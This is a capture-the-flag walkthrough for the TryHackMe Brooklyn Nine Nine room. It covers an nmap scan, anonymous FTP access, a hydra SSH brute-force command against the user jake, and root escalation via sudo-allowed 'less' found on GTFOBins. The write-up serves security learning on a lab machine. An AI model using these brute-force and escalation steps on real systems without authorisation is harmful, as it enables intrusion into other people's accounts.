TryHackMe: Brooklyn Nine Nine Room Write-up
To access the box click on the following link and join room.
Check connection
Ping machine IP to check if the connection is established. In my case ping is successful so the connection is established.
Scanning
Let’s start with a nmap scan. Use following command to scan the target IP address.
sudo nmap -sV -Pn 10.10.111.89The above command performs a service version detection scan using Nmap on the target IP address “10.10.111.89.” The options we used are:
sVEnables version detection to determine the service and its version running on open ports.PnTreats all hosts as online and does not perform host discovery. This can be useful when we already know the target is online and we don't want Nmap to waste time determining host status.
Nmap scan results shows that port 21, 22 and 80 are open. Port 21 is mostly reserved for ftp. Let’s find out if anonymous login is allowed. We can do that by scanning target IP for port 21.
nmap -p 21 --script ftp-anon.nse 10.10.111.89The above command uses Nmap to scan port 21 on the target IP address “10.10.111.89” and runs the Nmap script “ftp-anon.nse.” Here’s what each part of the command does:
p 21Specifies that we want to scan port 21, which is commonly associated with FTP (File Transfer Protocol).-script ftp-anon.nseExecutes the Nmap script "ftp-anon.nse." This script is designed to check if the FTP server on port 21 allows anonymous (unauthenticated) logins.10.10.111.89is the IP address of the target host we want to scan.
The scan results shows that Anonymous FTP login is allowed.
Anonymous FTP login
Let’s connect to the ftp service and check what we have got.
ftp 10.10.111.89We used “anonymous” as username and password to connect to FTP service and boom!!! we are in..
Lets find out what we have got with “ls” command. We found a file named “note_to_jake.txt”. Sounds interesting!!!
Let’s download the file to our machine with “get” command.
get note_to_jake.txt
Let’s check what note is in their for jake. We can do it with cat command.
cat note_to_jake.txt
Let’s all bow down to Amy, the password detective, for enlightening us about Jake’s password being as strong as a wet tissue paper! Bravo, Amy, for your remarkable discovery! Let’s check if we can ssh into jake’s account with a simple password.
Jake’s account is password protected. Let’s brute force it.
Brute-Force Attack
As, we know jake’s account has a weak password so let’s launch a brute-force attack with hydra, a powerful password cracking tool.
hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh://10.10.111.89hydrais the command to run the Hydra password-cracking tool.l jakespecifies the username to be used during the attack. In this case, it's trying the username "jake."P /usr/share/wordlists/rockyou.txtspecifies the path to a password list (in this case, RockYou.txt) to use for the dictionary attack.ssh://10.10.111.89specifies the target SSH server's IP address or hostname that we want to perform the attack on.
We got username and password for jake. Now, Let’s SSH using that information.
Boom!! We are in. Let’s verify the user by using command “whoami”
We have successfully logged in as jake.
Get user flag
Let’s search for user flag by using find command
find / -type f -name "user.txt" 2>/dev/null/is the starting directory for the search. In this case, it starts from the root directory, so it will search the entire file system.type foption specifies that we are looking for files (not directories).name "user.txt"is the name of the file we're searching for.2>/dev/nullRedirects error messages to /dev/null, so we won't see permission denied messages.
We found the flag. Let’s navigate to the respective directory and capture flag by using cat command.
We can see the user flag by viewing user.txt in terminal. Congratulations!! Let’s move on to mission possible 2! and capture root flag.
Get root flag
Now that we are logged in as the user jake, we will check our privileges by running the following command:
sudo -lIt displays information about which commands or scripts a user is allowed to execute with superuser (root) privileges or as another specified user.
Result shows we are allowed to run less with sudo privileges, Let’s go to https://gtfobins.github.io/ and search for less. GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. Click on sudo to get results.
We got a command let’s try that out.
That actually worked and we are the root user now.
I just assume that if user flag was in user.txt the root flag might be in root.txt. Let’s use find command again to find root.txt.
find / -type f -name "root.txt" 2>/dev/null/is the starting directory for the search. In this case, it starts from the root directory, so it will search the entire file system.type foption specifies that we are looking for files (not directories).name "root.txt"is the name of the file we're searching for.2>/dev/nullRedirects error messages to /dev/null, so we won't see permission denied messages.
We found the path of root.txt file. let’s use cat command to capture the flag. This time we will just use absolute path of file to cat.
There we go, we got our root flag! Paste both flags (user and root) on tryhackme and enjoy the success.
CONGRATULATIONS!!! The room is completed!
“This was the first approach we used to conquer the Brooklyn Nine-Nine Room challenge. If you’re curious about second method, you can dive into the writeup by clicking the link below.”
This walkthrough finishes here. Stay tuned for the next adventure! 🚀😊
